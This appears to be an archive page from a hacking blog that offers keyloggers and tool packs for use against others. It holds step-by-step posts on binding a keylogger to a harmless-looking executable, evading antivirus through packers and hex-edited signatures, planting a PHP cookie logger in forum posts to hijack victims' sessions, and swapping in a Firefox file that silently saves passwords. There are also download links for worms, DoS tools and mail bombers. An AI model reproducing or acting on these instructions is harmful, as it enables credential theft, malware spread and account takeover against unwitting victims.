Archive for the ‘Keyloggers’ Category

1.First off all you need to download a keylogger and build your server…

2.Downloadd a binder from here…

3.Select one small (KB) program of your choice… I m Using the “fear.exe” is the zompie firl from the MAZE game (If click it appears in your monitor with classic screaming sound… 😀

Download fear.exe from here…

4.Bing it. Bind your server and fear.exe (at your option) together…!

Done…!!!Go scan it. Its really 100% FUD…

Hello friends, today i am introducing you a ultra hacker kit special, it consists of more than 150 working hacking tools. 
Note: This material is posted for educational purposes only!
Hacking in any form is punishable offense. This material may be used by you only for the study of vulnerabilities, and nothing more.

hack tools, hacking tools,hacking software


This Package Includes:
AddrView
AddrView gives you the ability to analyze HTML pages and extract most of the address URL, contained in them. AddrView retrieves the URL of images (img – tag), links to other files (a – a tag), CSS files, frames, Flash files and more. You can save the extracted addresses list to text files, HTML or XML files, or add these addresses to the hut.

AnonFTP
This package contains / var / ftp area for anonymous FTP access.

AppToService
The program enables the command line to run regular applications as a service (service).
However, to install any application as a service is completely free – just enough to take the recommendations of the Windows XP FAQ.

arpinject
Any computer on the network can be easy to take and send a packet ARP_REPLAY. And thus make changes to the ARP table. Such an attack is called ARP Poisonig. Its result – redirect traffic to the desired host. Send the packet (s) can be programmatically by using a tool ARPInject.

aspack21
Very nice wrapper *. exe and *. dll files (in some cases the degree of compression is 70%). In addition, the program is good (especially for programmers who are trying to protect their trousers) the complexity of extracting compressed file. I understand that he ASPack packed ASPACK’om same 🙂 Not bad, and that the program allows you to check before final packing job “prepackaged” exe-file, in violation of its normal operation, uncompress.
The new version has improved the speed of packing and adds an option “maximum compression”. In unreported as the program runs 30 days. The interface is multilingual, including in Russian.

bios_pass_remover
Remove BIOS password

brutus
Brootforce xs which

Cable Modem Sniffer
Traffic interceptor cable modem

CapKeys_DIGITAL
Key update einfach per internet. abspeichern als SofCam.key und als textdatei moglich.

CGI Founder v1.043
Program for finding holes in CGI scripts.

CGISscan
Scanner CGI scripts

cports
Viewing connections and listening ports on your computer

craagle
The program for the automated search every seriynkov and keygens on many relevant archives.

CreditCardGjenerator

DeepUnFreez
“Makes computing environments easier to manage and maintain. Every Restart destroys all changes and reboots the computer to its original state, right down to the last byte”

E-mail Cracker
Recover forgotten mailbox passwords that are stored in the e-mail client. The program emulates the server POP3, and the password is sent back to the user. It supports any email client POP3.

ezDataBase_Defacer
Defeyser engine ezDataBase

FTP Brute Forcer
Brootforce FTP

ftpbr
Brootforce FTP

~ Censored ~ Mail Bomber 2.3
Bomer soap

G00B3RS_phpBB_exploit_pack
Pak exploits for phpBB Motor

Google_Hacker_1.2
Utility to help with queries from the series guglhak

grinder1.1
It helps you find instructions in the file specify the range of IP-address.

HackersAssistant
Software package for a hacker: Port Scanner, Ping Flooder, Server Slower, Connections, File Cleaner, Get Passwords, IP Validator, Web Browser, Ip Information, HTML Stealer, Site IP Retrieval, Winsock Scanner, exe Corruptor, Nuker, Hit Increaser, File Generator, Anonymous e-mail, Whois, Binary

HackTheGame
HackTheGame this game simulator life hacker. In which you take on the role of a hacker. Which xs for what and how to break the system. Join showdown with hack portals, in general, live a long and merry life. The main thing is not to get caught would be rubbish.

Hotmail Email Hacker / Hotmail HAcker Gold / Hotmail ScamPage / HotmailHack
In my still some sort of a heresy, not long running, hotmylo not so easy to hack

hydra-4.6-win
THC-Hydra – threaded cracker passwords to various services (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, etc.) for UNIX platforms. With this tool you can attack several services at once.

iecv
Internet Explorer Cookies View

ipnetinfo
The program, which displays information about IP address. It allows you to display detailed information concerning the country, the owner of the domain, the range of available IP addresses, contact information and much more. This tool will be useful, for example, when you need to know the origin of the mail received from an unknown destination. For this is enough simply to copy the message headers from your email program IPNetInfo. It will extract itself from the text of all IP addresses and make the necessary search. The software uses several Whois servers, thereby maximizing the impact of the search for a specific network address. Among other things, it allows you to create HTML report, which stores all necessary information about the selected IP addresses.

john-17w
password cracker, currently available for UNIX, DOS, Win32. Its main aim is to detect weak passwords UNIX. To the program you can buy a collection of word lists over 600 MB, with the help of which greatly simplifies the selection of passwords.

Key Changer
Commercial ($ 8.00) is free from trojans, designed to find and change the product key, Windows XP, such as piracy on the validity (if any). XP Key Changer after launch, finds the proposed changes to the key, and the name and organization registered in the system provided by Windows XP. Program XP Key Changer allows you to change XP Product Key and all this information, one click on all machines. Works with all service packs, including Windows XP SP3!

Key_Logger
keylogger R)

Legion NetBios Scanner v2.1
Scanner NEtBios Resources

Mail Boomb_2.0 YAHOO
Bomber soaps Yahoo

MooreR Port Scanner
Port scanner on the remote machine

MSN Flooder 2.0
Fluder messenger msn

NET BIOS Scanner
Scanner NEtBios Resources

NetBIOS Name Scanner
Scanner NEtBios Resources

NetResView
Scanner NEtBios Resources

NFO Maker 1.0
This plugin is for viewing nfo and diz files, which are usually located in the downloaded archive.
Warning: as reported by the author, “Unfortunately there was an unfortunate mistake. Setting.reg File added to the archive with the plugin. Setting.reg file separately can be downloaded here http://issoft.narod.ru/downloads/setting.reg

Nimda
“Nimda” is an Internet worm that spreads via the Internet as a file attachment in an e-mail, local area networks, as well as penetrating the unprotected IIS-servers. The original host file has the name of the worm README.EXE and is a program format Windows PE EXE, the size of about 57 kilobytes, and is written in Microsoft C + +.

NTPacker
Packer files

On-Off MSN
What is vklyuchalka vyklyuchalka MSN

PCAnyPass
PCAnywhere PassView Image of passwords with asterisks

Php Nuke Hacker v11.0
Burglar engine php nuke

phpBB Annihilator / phpbb attack / phpbb bruteforcer / PhpBB pass extractor / phpBB_DoS / phpbb_spammer / phpBBAttacker / phpBBcracker
A set of tools for hacking, spam, flood, ddos, Brutus phpBB

PhpBuGScan
Scanner bugs in scripts nxn

Ping & Nukes
pinger \ nyuker

Listener XP
The program allows to monitor network ports on your system, generating a pop-up window when trying to access the port. The program writes a log file of IP-addresses of connectable clients and sends you a request for permission to use it. You can enter the port numbers of their choice, or the program will prompt you to the default list. The program runs from the system tray.

pqwak2
This program for the selection of network paroley.Dostatochno quickly picks up a password on the specified drive on the network.

procexp
PROCEXP displays information about the processes of loading dynamic libraries and their svoystvah.Eto makes PROCEXP m schnym tool for understanding the internal behavior of applications as trace information leakage marker and DLL, version mismatch. And even the indirect determination of viruses.

ProxyPro
Scan, ping, proxy switches

rainbowcrack-1.2-src win-lin
The program allows you to create a predsgenerirovannyh LanManager hashes, with which you could almost instantly to crack almost any alphanumeric password.

Remote Shut Down
Vykyuchenie remote machine

ResHacker
Correction exe and dll files. Much can change in them. With this program you can easily Russify program.

RpcScan101
Network port scanner

Sasser
Sasser virus looks like the exhausted millions of Internet users worldwide in summer 2003 lovesan (blaster). Already, he has several of its modifications, which experts say is even more harmful than the original. The same way according to experts, this virus does not pose a threat to your hard drive, but only prevents the use of them fully functional. Its distinctive features – a message appears on trying to connect to the ip address of another computer and the error message LSA Shell (Export version) and follows it to restart the computer from a fatal error process lsass.exe

SendMailer
Sends a message in HTML format and in any encoding without mail client. Checks completion of mandatory fields. Checks E-Mail on the right (syntax). Converts special characters into HTML format. Allows you to specify multiple addresses to choose from. Checks sent and reports errors. Ability to send a copy to the sender. Very easy to configure. Also fits easily into any design. Gives ample opportunity to hide the real address. If desired, sends information about the browser and the IP address

Server 2003 Keygen
keygen for WINDOWS 2003 server

Server Killer
Ubiytsa servers R)

showpassv10
Opening a password for zvezdochkmi

sitedigger2
The program looks in the cache of Google potential vulnerabilities, errors, configuration problems on Web sites. The new version of the new version you can use FSDB / GHDB and generate 10 results for each signature. Posted as a large number of new signatures – open webcams, credit card numbers, etc.

SMBdie
WinNuke back! Introducing exploit completely kills or WinNT/2K/XP. NET machine with Network Share Provider (works on 139 and / or 445 port). Uses a malformed SMB (Server Message Block) packet is used anonymously, no account do not need to know – for only the IP address and computer name.

SQLScan v1.0
Utility guessing the password to Microsoft SQL server. Lets you scan a range of IP addresses. When backwater password creates an NT account with a blank password on a vulnerable system.

Stealth – HTTP Scanner v1.0 build 23
powerful tool for auditing security Web server, which looks at more than 19.000 vulnerabilities.

SuperScan4
Port scanner with a bunch of utilities. Also there is a useful utility that pulls out from companies (windows) all of the available Old using zero session.

tftpd32.273
a small freeware program, which includes simple to configure DHCP, TFTP, SNTP and Syslog servers as well as TFTP client

traceroute
This is a utility computer program designed to identify routes data networks TCP / IP.

udpflood
UDP packet sender. Tool flood UDP packets to specified IP and port. Used to test the stability of network services to a UDP flood. Packages can be specified by the user or be completely random.

Ultra Dos
Program for DDOS remote machine

WebCracker 4.0
Cute program to guess passwords for sites.

and much more…
1. Encryptors/Compressors:

You would think this should be the easiest way to UD (Undetect) a Trojan…but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.

Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.

2. Byte Adders:

This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.

3. Hex Editing:

This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.

The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.

Step One: Place your Trojan Server in a folder.

Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.

Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.

Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.

Step Five: Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.

Step Six: Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).

You have to remember that different AV software use different signatures, so scan with as many as you can.

Download Hexeditor + file splitter & joiner here…
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif

Click To Download Script here or here

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET[“cookie”]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET[“cookie”]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :


Step 5: Go to the victim forum and insert this code in the signature or a post:

Click to download here or here

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
http://www.mediafire.com/?9qa37of7ihd1z
Password: ABlaZerBoTRelease

Features:

★ Inbuilt Web Browser with Java Script and Flash

★ Email Bomber

★ Port Scanner

★ Screen Recorder

★ Pinger

★ Anti-Virus Finder

★ File-Downloader and much more…..

Requirements:

• Dot Net Framework

Compatible OSes

• Windows 7 (32 & 64 Bit) (Tested)..

• Windows Vista (32 & 64 Bit) (Tested)..

• Windows XP (32 & 64 Bit) (Tested)…

Features to Come

– Stealer..

– Keylogger..

– FTP Client..

– SQLi Helper..

– Admin Page Finder..

– Exploit Finder..

http://www.mediafire.com/?jfs6x2n9jrse3pr
Username 2659139
Password 4invyho3
DOWNLOAD HERE:
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm

This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack or audit for ethical reasons your friends accounts.

No additional software or tool is required just need to replace it with existing one.
Steps to Turn Your Firefox Into A KeyLogger

  • Close Firefox Application if open
  • Go to: Windows- C:/Program Files/Mozilla Firefox/Components
  • Find The Script Named ” nsLoginManagerPrompter.js”
  • Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.
From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes…